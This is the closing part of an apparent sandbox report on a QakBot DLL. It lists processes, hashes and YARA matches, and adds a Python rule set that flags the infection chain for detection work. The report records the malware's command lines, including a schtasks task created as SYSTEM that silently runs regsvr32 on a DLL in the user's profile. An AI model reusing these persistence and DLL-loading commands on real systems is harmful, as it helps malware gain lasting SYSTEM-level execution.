                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: QakBot, Description: QakBot Payload, Source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, Author: kevoreilly
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:10
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0x12b0000
                                                                                                                                                              File size:3611360 bytes
                                                                                                                                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: QakBot, Description: QakBot Payload, Source: 00000004.00000002.973589332.0000000001100000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:11
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:regsvr32 ..\gihi2.dll
                                                                                                                                                              Imagebase:0x13b0000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: QakBot, Description: QakBot Payload, Source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, Author: kevoreilly
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:12
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06
                                                                                                                                                              Imagebase:0x1390000
                                                                                                                                                              File size:185856 bytes
                                                                                                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:12
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff724c50000
                                                                                                                                                              File size:625664 bytes
                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:13
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:regsvr32.exe -s 'C:\Users\user\gihi1.dll'
                                                                                                                                                              Imagebase:0x7ff65e5f0000
                                                                                                                                                              File size:24064 bytes
                                                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:13
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline: -s 'C:\Users\user\gihi1.dll'
                                                                                                                                                              Imagebase:0x13b0000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:15
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0x12b0000
                                                                                                                                                              File size:3611360 bytes
                                                                                                                                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: QakBot, Description: QakBot Payload, Source: 0000000D.00000002.713096999.0000000000660000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:16
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 652
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:434592 bytes
                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:54:00
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:regsvr32.exe -s 'C:\Users\user\gihi1.dll'
                                                                                                                                                              Imagebase:0x7ff65e5f0000
                                                                                                                                                              File size:24064 bytes
                                                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:54:00
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline: -s 'C:\Users\user\gihi1.dll'
                                                                                                                                                              Imagebase:0x13b0000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                              General

                                                                                                                                                              Start time:20:54:02
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 652
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:434592 bytes
                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
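The process listing above shows the whole QakBot chain in four moves: Excel spawns regsvr32 on a relative-path DLL in the user's profile, that regsvr32 starts a 32-bit explorer.exe to inject into, schtasks registers a run-once task as NT AUTHORITY\SYSTEM whose action is another regsvr32 -s on the same DLL, and the task fires at 20:54. The block below is an added example, not part of the Joe Sandbox report or of any detection product, that replays those checks over constructed process records. Paths and command lines are copied from the listing (with the report's single-quote rendering turned back into Windows double quotes); the PIDs, the parent-child links and the benign control record are assumptions made for the example, since the report does not print parent PIDs.

```python
"""Rule set for the Office -> regsvr32 -> explorer.exe -> schtasks chain.

Constructed data and assumed parent links; see the lead-in above."""

import re
from dataclasses import dataclass

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "cmd.exe", "powershell.exe"}
# Module roots a standard user cannot write to.  Anything else (profile,
# temp, relative paths such as ..\gihi1.dll, UNC shares) is untrusted.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\",
                 "c:\\program files (x86)\\")

# Double-quoted argument with backslash-escaped quotes inside (the form
# schtasks /tr receives), or a bare whitespace-delimited token.
_TOKEN = re.compile(r'"((?:\\.|[^"\\])*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line into arguments, unescaping \" in quotes."""
    out = []
    for quoted, bare in _TOKEN.findall(cmdline):
        out.append(bare if bare else quoted.replace('\\"', '"'))
    return out


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def untrusted_modules(tokens):
    """Non-switch arguments of a LOLBin that do not sit under a trusted root."""
    return [t for t in tokens[1:]
            if not t.startswith(("/", "-"))
            and not t.lower().startswith(TRUSTED_ROOTS)]


def option(tokens, name):
    """Value following a case-insensitive switch such as /RU or /tr."""
    for i, t in enumerate(tokens[:-1]):
        if t.lower() == name.lower():
            return tokens[i + 1]
    return None


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def analyze(procs):
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        pname = basename(parent.image) if parent else ""
        toks = tokenize(p.cmdline)
        # Sigma "Microsoft Office Product Spawning Windows Shell" analogue.
        if pname in OFFICE_IMAGES and name in LOLBINS:
            findings.append(Finding("office_spawns_lolbin", p.pid, f"{pname} -> {name}"))
        # regsvr32 loading a module from a user-writable or relative path.
        if name == "regsvr32.exe":
            for mod in untrusted_modules(toks):
                findings.append(Finding("regsvr32_untrusted_module", p.pid, mod))
        # explorer.exe is normally started by userinit, not by a LOLBin; a
        # LOLBin parent marks it as an injection host.
        if name == "explorer.exe" and pname in LOLBINS:
            findings.append(Finding("lolbin_spawns_explorer", p.pid, f"{pname} -> {p.image}"))
        # Sigma "Schedule system process" analogue: /Create as SYSTEM whose
        # action is a LOLBin on an untrusted module (/Z deletes the task
        # after its final run, so the evidence is short-lived).
        if name == "schtasks.exe" and "/create" in (t.lower() for t in toks):
            run_as = (option(toks, "/ru") or "").lower()
            action = tokenize(option(toks, "/tr") or "")
            if run_as.endswith("system") and action and basename(action[0]) in LOLBINS:
                mods = untrusted_modules(action)
                if mods:
                    findings.append(Finding("schtasks_system_runs_untrusted_module",
                                            p.pid, f"{basename(action[0])} {' '.join(mods)}"))
    return findings


# Constructed records: paths/command lines from the listing, PIDs and parent
# links assumed (pid 5 is started by the Task Scheduler service, pid 6 is a
# benign control registering a DLL from a trusted path).
PROCS = [
    Proc(1, 0, r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
         r'"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding'),
    Proc(2, 1, r"C:\Windows\SysWOW64\regsvr32.exe", r"regsvr32 ..\gihi1.dll"),
    Proc(3, 2, r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    Proc(4, 3, r"C:\Windows\SysWOW64\schtasks.exe",
         r'"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn wtdsqwcv '
         r'/tr "regsvr32.exe -s \"C:\Users\user\gihi1.dll\"" /SC ONCE /Z /ST 20:54 /ET 21:06'),
    Proc(5, 0, r"C:\Windows\System32\regsvr32.exe", r'regsvr32.exe -s "C:\Users\user\gihi1.dll"'),
    Proc(6, 0, r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),
]

if __name__ == "__main__":
    for f in analyze(PROCS):
        print(f"pid {f.pid}: {f.rule}: {f.detail}")
```

Each record in the chain trips at least one rule while the control record trips none; the two regsvr32 hits on the same DLL (relative path from Excel, absolute path from the SYSTEM task) are what tie the initial access to the persistence step when hunting across hosts.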

Disassembly

Code Analysis
